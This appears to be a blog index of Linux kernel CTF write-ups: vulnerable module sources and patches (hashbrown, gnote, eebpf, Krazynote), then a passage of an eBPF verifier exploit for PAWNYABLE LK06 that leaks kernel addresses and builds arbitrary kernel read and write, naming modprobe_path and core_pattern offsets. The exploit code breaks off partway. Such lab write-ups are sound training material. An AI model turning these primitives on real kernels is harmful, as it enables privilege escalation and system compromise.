Posts for: #2025

DiceCTF2021 hashbrown


Problem

Environment

  • linux version: 5.11.0-rc3
    • CONFIG_SLAB_FREELIST_RANDOM=y
    • CONFIG_SLAB=y
    • CONFIG_FG_KASLR=y
  • unprivileged_userfaultfd: 1
  • unprivileged_bpf_disabled: 0

Module

      #include <linux/device.h>
#include <linux/fs.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/mutex.h>
#include <linux/slab.h>
#include <linux/uaccess.h>

#define DEVICE_NAME "hashbrown"
#define CLASS_NAME "hashbrown"

MODULE_AUTHOR("FizzBuzz101");
MODULE_DESCRIPTION("Here's a hashbrown for everyone!");
MODULE_LICENSE("GPL");

#define ADD_KEY 0x1337
#define DELETE_KEY 0x1338
#define UPDATE_VALUE 0x1339
#define DELETE_VALUE 0x133a
#define GET_VALUE 0x133b

#define SIZE_ARR_START 0x10
#define SIZE_ARR_MAX 0x200
#define MAX_ENTRIES 0x400
#define MAX_VALUE_SIZE 0xb0
#define GET_THRESHOLD(size) size - (size >> 2)

#define INVALID 1
#define EXISTS 2
#define NOT_EXISTS 3
#define MAXED 4

static DEFINE_MUTEX(operations_lock);
static DEFINE_MUTEX(resize_lock);
static long hashmap_ioctl(struct file *file, unsigned int cmd,
                          unsigned long arg);

static int major;
static struct class *hashbrown_class = NULL;
static struct device *hashbrown_device = NULL;
static struct file_operations hashbrown_fops = {.unlocked_ioctl =
                                                    hashmap_ioctl};

typedef struct {
  uint32_t key;
  uint32_t size;
  char *src;
  char *dest;
} request_t;

struct hash_entry {
  uint32_t key;
  uint32_t size;
  char *value;
  struct hash_entry *next;
};
typedef struct hash_entry hash_entry;

typedef struct {
  uint32_t size;
  uint32_t threshold;
  uint32_t entry_count;
  hash_entry **buckets;
} hashmap_t;
hashmap_t hashmap;

static noinline uint32_t get_hash_idx(uint32_t key, uint32_t size);

static noinline long resize(request_t *arg);
static noinline void resize_add(uint32_t idx, hash_entry *entry,
                                hash_entry **new_buckets);
static noinline void resize_clean_old(void);

static noinline long add_key(uint32_t idx, uint32_t key, uint32_t size,
                             char *src);
static noinline long delete_key(uint32_t idx, uint32_t key);
static noinline long update_value(uint32_t idx, uint32_t key, uint32_t size,
                                  char *src);
static noinline long delete_value(uint32_t idx, uint32_t key);
static noinline long get_value(uint32_t idx, uint32_t key, uint32_t size,
                               char *dest);

#pragma GCC push_options
#pragma GCC optimize("O1")

static long hashmap_ioctl(struct file *file, unsigned int cmd,
                          unsigned long arg) {
  long result;
  request_t request;
  uint32_t idx;

  if (cmd == ADD_KEY) {
    if (hashmap.entry_count == hashmap.threshold &&
        hashmap.size < SIZE_ARR_MAX) {
      mutex_lock(&resize_lock);
      result = resize((request_t *)arg);
      mutex_unlock(&resize_lock);
      return result;
    }
  }

  mutex_lock(&operations_lock);
  if (copy_from_user((void *)&request, (void *)arg, sizeof(request_t))) {
    result = INVALID;
  } else if (cmd == ADD_KEY && hashmap.entry_count == MAX_ENTRIES) {
    result = MAXED;
  } else {
    idx = get_hash_idx(request.key, hashmap.size);
    switch (cmd) {
      case ADD_KEY:
        result = add_key(idx, request.key, request.size, request.src);
        break;
      case DELETE_KEY:
        result = delete_key(idx, request.key);
        break;
      case UPDATE_VALUE:
        result = update_value(idx, request.key, request.size, request.src);
        break;
      case DELETE_VALUE:
        result = delete_value(idx, request.key);
        break;
      case GET_VALUE:
        result = get_value(idx, request.key, request.size, request.dest);
        break;
      default:
        result = INVALID;
        break;
    }
  }
  mutex_unlock(&operations_lock);
  return result;
}

static uint32_t get_hash_idx(uint32_t key, uint32_t size) {
  uint32_t hash;
  key ^= (key >> 20) ^ (key >> 12);
  hash = key ^ (key >> 7) ^ (key >> 4);
  return hash & (size - 1);
}

static noinline void resize_add(uint32_t idx, hash_entry *entry,
                                hash_entry **new_buckets) {
  if (!new_buckets[idx]) {
    new_buckets[idx] = entry;
  } else {
    entry->next = new_buckets[idx];
    new_buckets[idx] = entry;
  }
}

static noinline void resize_clean_old() {
  int i;
  hash_entry *traverse, *temp;
  for (i = 0; i < hashmap.size; i++) {
    if (hashmap.buckets[i]) {
      traverse = hashmap.buckets[i];
      while (traverse) {
        temp = traverse;
        traverse = traverse->next;
        kfree(temp);
      }
      hashmap.buckets[i] = NULL;
    }
  }
  kfree(hashmap.buckets);
  hashmap.buckets = NULL;
  return;
}

static long resize(request_t *arg) {
  hash_entry **new_buckets, *temp_entry, *temp;
  request_t request;
  char *temp_data;
  uint32_t new_size, new_threshold, new_idx;
  int i, duplicate;

  if (copy_from_user((void *)&request, (void *)arg, sizeof(request_t))) {
    return INVALID;
  }
  if (request.size < 1 || request.size > MAX_VALUE_SIZE) {
    return INVALID;
  }

  new_size = hashmap.size * 2;
  new_threshold = GET_THRESHOLD(new_size);
  new_buckets = kzalloc(sizeof(hash_entry *) * new_size, GFP_KERNEL);

  if (!new_buckets) {
    return INVALID;
  }

  duplicate = 0;
  for (i = 0; i < hashmap.size; i++) {
    if (hashmap.buckets[i]) {
      for (temp_entry = hashmap.buckets[i]; temp_entry != NULL;
           temp_entry = temp_entry->next) {
        if (temp_entry->key == request.key) {
          duplicate = 1;
        }
        new_idx = get_hash_idx(temp_entry->key, new_size);
        temp = kzalloc(sizeof(hash_entry), GFP_KERNEL);
        if (!temp) {
          kfree(new_buckets);
          return INVALID;
        }
        temp->key = temp_entry->key;
        temp->size = temp_entry->size;
        temp->value = temp_entry->value;
        resize_add(new_idx, temp, new_buckets);
      }
    }
  }
  if (!duplicate) {
    new_idx = get_hash_idx(request.key, new_size);
    temp = kzalloc(sizeof(hash_entry), GFP_KERNEL);
    if (!temp) {
      kfree(new_buckets);
      return INVALID;
    }
    temp_data = kzalloc(request.size, GFP_KERNEL);
    if (!temp_data) {
      kfree(temp);
      kfree(new_buckets);
      return INVALID;
    }
    if (copy_from_user(temp_data, request.src, request.size)) {
      kfree(temp_data);
      kfree(temp);
      kfree(new_buckets);
      return INVALID;
    }
    temp->size = request.size;
    temp->value = temp_data;
    temp->key = request.key;
    temp->next = NULL;
    resize_add(new_idx, temp, new_buckets);
    hashmap.entry_count++;
  }
  resize_clean_old();
  hashmap.size = new_size;
  hashmap.threshold = new_threshold;
  hashmap.buckets = new_buckets;
  return (duplicate) ? EXISTS : 0;
}

static long add_key(uint32_t idx, uint32_t key, uint32_t size, char *src) {
  hash_entry *temp_entry, *temp;
  char *temp_data;
  if (size < 1 || size > MAX_VALUE_SIZE) {
    return INVALID;
  }

  temp_entry = kzalloc(sizeof(hash_entry), GFP_KERNEL);
  temp_data = kzalloc(size, GFP_KERNEL);
  if (!temp_entry || !temp_data) {
    return INVALID;
  }
  if (copy_from_user(temp_data, src, size)) {
    return INVALID;
  }
  temp_entry->key = key;
  temp_entry->size = size;
  temp_entry->value = temp_data;
  temp_entry->next = NULL;

  if (!hashmap.buckets[idx]) {
    hashmap.buckets[idx] = temp_entry;
    hashmap.entry_count++;
    return 0;
  } else {
    for (temp = hashmap.buckets[idx]; temp->next != NULL; temp = temp->next) {
      if (temp->key == key) {
        kfree(temp_data);
        kfree(temp_entry);
        return EXISTS;
      }
    }
    if (temp->key == key) {
      kfree(temp_data);
      kfree(temp_entry);
      return EXISTS;
    }
    temp->next = temp_entry;
    hashmap.entry_count++;
    return 0;
  }
}

static long delete_key(uint32_t idx, uint32_t key) {
  hash_entry *temp, *prev;

  if (!hashmap.buckets[idx]) {
    return NOT_EXISTS;
  }
  if (hashmap.buckets[idx]->key == key) {
    temp = hashmap.buckets[idx]->next;
    if (hashmap.buckets[idx]->value) {
      kfree(hashmap.buckets[idx]->value);
    }
    kfree(hashmap.buckets[idx]);
    hashmap.buckets[idx] = temp;
    hashmap.entry_count--;
    return 0;
  }
  temp = hashmap.buckets[idx];
  while (temp != NULL && temp->key != key) {
    prev = temp;
    temp = temp->next;
  }
  if (temp == NULL) {
    return NOT_EXISTS;
  }
  prev->next = temp->next;
  if (temp->value) {
    kfree(temp->value);
  }
  kfree(temp);
  hashmap.entry_count--;
  return 0;
}

static long update_value(uint32_t idx, uint32_t key, uint32_t size, char *src) {
  hash_entry *temp;
  char *temp_data;

  if (size < 1 || size > MAX_VALUE_SIZE) {
    return INVALID;
  }
  if (!hashmap.buckets[idx]) {
    return NOT_EXISTS;
  }

  for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp->next) {
    if (temp->key == key) {
      if (temp->size != size) {
        if (temp->value) {
          kfree(temp->value);
        }
        temp->value = NULL;
        temp->size = 0;
        temp_data = kzalloc(size, GFP_KERNEL);
        if (!temp_data || copy_from_user(temp_data, src, size)) {
          return INVALID;
        }
        temp->size = size;
        temp->value = temp_data;
      } else {
        if (copy_from_user(temp->value, src, size)) {
          return INVALID;
        }
      }
      return 0;
    }
  }
  return NOT_EXISTS;
}

static long delete_value(uint32_t idx, uint32_t key) {
  hash_entry *temp;
  if (!hashmap.buckets[idx]) {
    return NOT_EXISTS;
  }
  for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp->next) {
    if (temp->key == key) {
      if (!temp->value || !temp->size) {
        return NOT_EXISTS;
      }
      kfree(temp->value);
      temp->value = NULL;
      temp->size = 0;
      return 0;
    }
  }
  return NOT_EXISTS;
}

static long get_value(uint32_t idx, uint32_t key, uint32_t size, char *dest) {
  hash_entry *temp;
  if (!hashmap.buckets[idx]) {
    return NOT_EXISTS;
  }
  for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp->next) {
    if (temp->key == key) {
      if (!temp->value || !temp->size) {
        return NOT_EXISTS;
      }
      if (size > temp->size) {
        return INVALID;
      }
      if (copy_to_user(dest, temp->value, size)) {
        return INVALID;
      }
      return 0;
    }
  }
  return NOT_EXISTS;
}

#pragma GCC pop_options

static int __init init_hashbrown(void) {
  major = register_chrdev(0, DEVICE_NAME, &hashbrown_fops);
  if (major < 0) {
    return -1;
  }
  hashbrown_class = class_create(THIS_MODULE, CLASS_NAME);
  if (IS_ERR(hashbrown_class)) {
    unregister_chrdev(major, DEVICE_NAME);
    return -1;
  }
  hashbrown_device =
      device_create(hashbrown_class, 0, MKDEV(major, 0), 0, DEVICE_NAME);
  if (IS_ERR(hashbrown_device)) {
    class_destroy(hashbrown_class);
    unregister_chrdev(major, DEVICE_NAME);
    return -1;
  }
  mutex_init(&operations_lock);
  mutex_init(&resize_lock);

  hashmap.size = SIZE_ARR_START;
  hashmap.entry_count = 0;
  hashmap.threshold = GET_THRESHOLD(hashmap.size);
  hashmap.buckets = kzalloc(sizeof(hash_entry *) * hashmap.size, GFP_KERNEL);
  printk(KERN_INFO "HashBrown Loaded! Who doesn't love Hashbrowns!\n");
  return 0;
}

static void __exit exit_hashbrown(void) {
  device_destroy(hashbrown_class, MKDEV(major, 0));
  class_unregister(hashbrown_class);
  class_destroy(hashbrown_class);
  unregister_chrdev(major, DEVICE_NAME);
  mutex_destroy(&operations_lock);
  mutex_destroy(&resize_lock);
  printk(KERN_INFO "HashBrown Unloaded\n");
}

module_init(init_hashbrown);
module_exit(exit_hashbrown);

This module allow us to add, delete and update key and value to hashmap.

Read more →

TokyoWesternsCTF2019 gnote


Problem

Environment

  • linux version: 4.19.65
  • mmap_min_addr: 0x1000
  • No SMAP

Module

      typedef struct request_t {
  uint32_t cmd;
  uint32_t arg;
} request_t;

int64_t gnote_write(struct file *a1, const request_t *req, size_t a3,
                    loff_t *a4) {
  uint64_t len;
  note_data_t *req;
  void *new_note_data;

  mutex_lock(&lock);
  switch (req->cmd) {
    case 1:
      if ((uint64_t)cnt <= 7) {
        len = (uint32_t)req->arg;
        cur_note = &notes[cnt];
        cur_note->len = len;
        if (len <= 0x10000) {
          new_note_data = kmalloc(len, 0x6000C0LL);
          ++cnt;
          cur_note->data = new_note_data;
        }
      }
      break;
    case 2:
      printk("Edit Not implemented\n");
      break;
    case 3:
      printk("Delete Not implemented\n");
      break;
    case 4:
      printk("Copy Not implemented\n");
      break;
    case 5:
      if ((uint32_t)req->arg < (uint64_t)cnt) selected = (uint32_t)req->arg;
      break;
    default:
      break;
  }
  mutex_unlock(&lock);
  return a3;
}

uint64_t gnote_read(struct file *a1, char *a2, size_t len, loff_t *a4) {
  note_data_t *cur_note;

  mutex_lock(&lock);
  if (selected == -1) {
    mutex_unlock(&lock);
    return 0LL;
  } else {
    cur_note = &notes[selected];
    if (cur_note->len <= len) len = cur_note->len;
    copy_to_user(a2, cur_note->data, len);
    selected = -1LL;
    mutex_unlock(&lock);
    return len;
  }
}

The gnote module has just 3 features: add new note, select note and get note’s content. But with these features, we cannot write content to note (Edit is not implemented…).

Read more →

TokyoWesternsCTF2020 eebpf


Problem

Environment

  • kernel version: 5.4.58
  • unprivileged_bpf_disabled: 0

Patch file

The important part is following:

      diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/include/uapi/linux/bpf.h buildroot-2020.08-rc3_original/output/build/linux-5.4.58/include/uapi/linux/bpf.h
27d26
< #define BPF_ALSH	0xe0	/* sign extending arithmetic shift left */
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/tnum.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/tnum.c
42,52d41
< struct tnum tnum_alshift(struct tnum a, u8 min_shift, u8 insn_bitness)
< {
< 	if (insn_bitness == 32)
< 		//Never reach here now.
< 		return TNUM((u32)(((s32)a.value) << min_shift),
< 			    (u32)(((s32)a.mask)  << min_shift));
< 	else
< 		return TNUM((s64)a.value << min_shift,
< 			    (s64)a.mask  << min_shift);
< }
< 
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/verifier.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/verifier.c
4867,4897d4866
< 	case BPF_ALSH:
< 		if (umax_val >= insn_bitness) {
< 			/* Shifts greater than 31 or 63 are undefined.
< 			 * This includes shifts by a negative number.
< 			 */
< 			mark_reg_unknown(env, regs, insn->dst_reg);
< 			break;
< 		}
< 
< 		/* Upon reaching here, src_known is true and
< 		 * umax_val is equal to umin_val.
< 		 */
< 		if (insn_bitness == 32) {
< 			//Now we don't support 32bit. Cuz im too lazy.
< 			mark_reg_unknown(env, regs, insn->dst_reg);
< 			break;
< 		} else {
< 			dst_reg->smin_value <<= umin_val;
< 			dst_reg->smax_value <<= umin_val;
< 		}
< 
< 		dst_reg->var_off = tnum_alshift(dst_reg->var_off, umin_val,
< 						insn_bitness);
< 
< 		/* blow away the dst_reg umin_value/umax_value and rely on
< 		 * dst_reg var_off to refine the result.
< 		 */
< 		dst_reg->umin_value = 0;
< 		dst_reg->umax_value = U64_MAX;
< 		__update_reg_bounds(dst_reg);
< 		break;

And related location is following:

Read more →

BalsnCTF2019 Krazynote


Problem

Environment

  • kernel version: 5.1.9

Features

This challenge provide note misc device with which we can save(0xffffff00) and get(0xffffff02), update(0xffffff01) data using unlocked_ioctl. When we save and get, update data on it, the xor-encrypted data is stored.

And the struct enc_data (stored data) and struct request_t is following:

typedef struct request_t {
  uint64_t idx;
  uint64_t size;
  uint64_t data;
} request_t;

typedef struct enc_data_t {
  uint64_t xor_key;
  uint64_t size;
  uint64_t data_addr_minus_page_offset_base;
  char enc_data[0]; // Struct Hack; see https://www.geeksforgeeks.org/struct-hack/
} enc_data_t;

Vulnerability

Since unlocked_ioctl does not perform blocked-ioctl and the device does not use mutex, we can do race condition attack easily. Furthermore in given kernel environment, non-privileged userfaultfd is allowed.

Read more →

PAWNYABLE LK06: Brahman


LK06: Brahman

Exploit using adjust_ptr_min_max_vals

      // Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    <               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    >               // `scalar_min_max_or` will handler the case
//    >               //__mark_reg32_known(dst_reg, var32_off.value);

#include <asm-generic/socket.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "bpf_insn.h"

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue("Press enter to exit...");
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &attr);
  if (map_fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (res < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  write(socks[1], "Hello", 5);

  bpf_map_lookup(mapfd, 0, &val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
